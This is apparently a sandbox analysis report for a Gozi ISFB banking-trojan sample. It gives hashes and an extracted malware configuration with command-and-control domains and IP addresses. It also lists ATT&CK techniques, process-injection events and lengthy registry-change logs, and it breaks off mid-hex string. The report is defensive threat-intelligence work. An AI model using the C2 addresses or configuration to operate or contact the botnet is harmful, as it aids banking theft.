gozi_ifsb | 4e9c392b5532fd3823e854c4db17212b392d41c0f3310021022d9cbf1bca8658

Analysis

max time kernel
150s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
23-09-2022 07:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4e.exe
Size

37KB
MD5

ff981f29daba877bc365211aabfe8801
SHA1

f9d94bb62c230210afdde498ec0b0c119edb3466
SHA256

4e9c392b5532fd3823e854c4db17212b392d41c0f3310021022d9cbf1bca8658
SHA512

14740e902bec6ebe8fafd62b8042d087888a35f4f7906c13723fe8c85f48fb5cc65aa37222404d0b641ba60c37fa44aeea03bfd12fd37dc1d832fd13e2c48d43
SSDEEP

768:WtGIijUZYyyS3LaihVw8X/vrJEKmK9FhbYaMx4LqLriNdDAVGYRa09BV31C:gZi947aivwmrJEKmK9VMxWOrMd4X7p

Score

10^/10

gozi_ifsb 1900 banker trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

1900

tel.msn.com

194.76.225.60

185.212.47.133

Attributes

base_path
/doorway/
build
250235
exe_type
loader
extension
.drr
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi_ifsb

Botnet

1900

apnfy.msn.com

194.76.225.61

185.212.47.186

45.11.180.215

45.11.180.219

Attributes

base_path
/doorway/
build
250240
exe_type
worker
extension
.drr
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	Process	procid_target
PID 2256 set thread context of 2440	2256	powershell.exe	45
PID 2440 set thread context of 3456	2440	Explorer.EXE	15
PID 2440 set thread context of 3764	2440	Explorer.EXE	38
PID 2440 set thread context of 4620	2440	Explorer.EXE	36
PID 2440 set thread context of 3368	2440	Explorer.EXE	102
PID 2440 set thread context of 2320	2440	Explorer.EXE	26
PID 3368 set thread context of 4900	3368	cmd.exe	104
PID 2440 set thread context of 4224	2440	Explorer.EXE	105

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 3 IoCs

discovery

Remote System Discovery

T1018

Processes:

net.exenet.exenet.exe

pid	Process
8	net.exe
2404	net.exe
2200	net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

Processes:

tasklist.exe

pid	Process
3140	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
340	systeminfo.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f5f7ee6-9107-4f4d- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14f53c63-b67b-4f94- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000146224261dcfd801fc983e261dcfd801fc983e261dcfd801942d0e000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000386134363862303866353763326163616665633865326335643036613565316635383166343962373037353462346237356631386163353133346265343939310000b20009000400efbe3755b93a3755b93a2e00000000000000000000000000000000000000000000000000041d4400380061003400360038006200300038006600350037006300320061006300610066006500630038006500320063003500640030003600610035006500310066003500380031006600340039006200370030003700350034006200340062003700350066003100380061006300350031003300340062006500340039003900310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38613436386230386635376332616361666563386532633564303661356531663538316634396237303735346234623735663138616335313334626534393931000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f2a5a1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f2a5a1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca425c68-f934-4f95- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca425c68-f934-4f95- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18471c9e-3897-482d- = 2cb90f271dcfd801	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e3315572-42d5-4142- = "\\\\?\\Volume{2339E045-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2f9b07b141cc14c0a34ba3c8d12c9b2629d713791c1315310cb401583f50d906"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c9085bb-b380-4f1f-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b96bbc2-faf1-49dc-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89d69bfd-87ec-41b4-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f3eea6c0-4692-4111-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f5f7ee6-9107-4f4d- = 382361251dcfd801	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cfe9323-3cfc-41cd- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003d7818261dcfd80144f12d261dcfd80144f12d261dcfd8019b770a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000393533316163393164653138333034343166333936623939623439343130353062353432653937373164316463616231633834363563613765353732303564300000b20009000400efbe3755b93a3755b93a2e0000000000000000000000000000000000000000000000000061925900390035003300310061006300390031006400650031003800330030003400340031006600330039003600620039003900620034003900340031003000350030006200350034003200650039003700370031006400310064006300610062003100630038003400360035006300610037006500350037003200300035006400300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39353331616339316465313833303434316633393662393962343934313035306235343265393737316431646361623163383436356361376535373230356430000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f2a4a1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f2a4a1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e3315572-42d5-4142- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b96bbc2-faf1-49dc-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca425c68-f934-4f95-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f5f7ee6-9107-4f4d-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d3665e34-9dd0-4957-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e54555e2-a2a1-48cd-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89d69bfd-87ec-41b4- = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6ce58824-7d14-4530-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\aa8797ef-e17a-4e70- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca425c68-f934-4f95- = "\\\\?\\Volume{2339E045-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a74d40e58cc915246b37165435ccd0cbaee9f27fa6feecb0c26d30eacdb35509"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b96bbc2-faf1-49dc- = "\\\\?\\Volume{2339E045-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9531ac91de1830441f396b99b4941050b542e9771d1dcab1c8465ca7e57205d0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b96bbc2-faf1-49dc- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009f684b251dcfd8019f684b251dcfd8019f684b251dcfd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000393533316163393164653138333034343166333936623939623439343130353062353432653937373164316463616231633834363563613765353732303564300000b20009000400efbe3755b93a3755b93a2e0000000000000000000000000000000000000000000000000061925900390035003300310061006300390031006400650031003800330030003400340031006600330039003600620039003900620034003900340031003000350030006200350034003200650039003700370031006400310064006300610062003100630038003400360035006300610037006500350037003200300035006400300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39353331616339316465313833303434316633393662393962343934313035306235343265393737316431646361623163383436356361376535373230356430000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f299a1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f299a1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6ce58824-7d14-4530- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cfe9323-3cfc-41cd-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e54555e2-a2a1-48cd-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89d69bfd-87ec-41b4-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\aa8797ef-e17a-4e70-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\aa8797ef-e17a-4e70- = "\\\\?\\Volume{2339E045-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a74d40e58cc915246b37165435ccd0cbaee9f27fa6feecb0c26d30eacdb35509"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cfe9323-3cfc-41cd-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14f53c63-b67b-4f94- = "\\\\?\\Volume{2339E045-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8a468b08f57c2acafec8e2c5d06a5e1f581f49b70754b4b75f18ac5134be4991"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e3315572-42d5-4142- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f5f7ee6-9107-4f4d-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f5f7ee6-9107-4f4d-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18471c9e-3897-482d- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e3315572-42d5-4142-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b96bbc2-faf1-49dc- = db0e58251dcfd801	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1b96bbc2-faf1-49dc- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89d69bfd-87ec-41b4- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f4666a251dcfd801f4666a251dcfd801f4666a251dcfd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000396131333934306362323366333965396630376539613266383634646234666433643434343664336137646135636339373233636161386537633238666362350000b20009000400efbe3755b93a3755b93a2e000000000000000000000000000000000000000000000000000c943a00390061003100330039003400300063006200320033006600330039006500390066003000370065003900610032006600380036003400640062003400660064003300640034003400340036006400330061003700640061003500630063003900370032003300630061006100380065003700630032003800660063006200350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963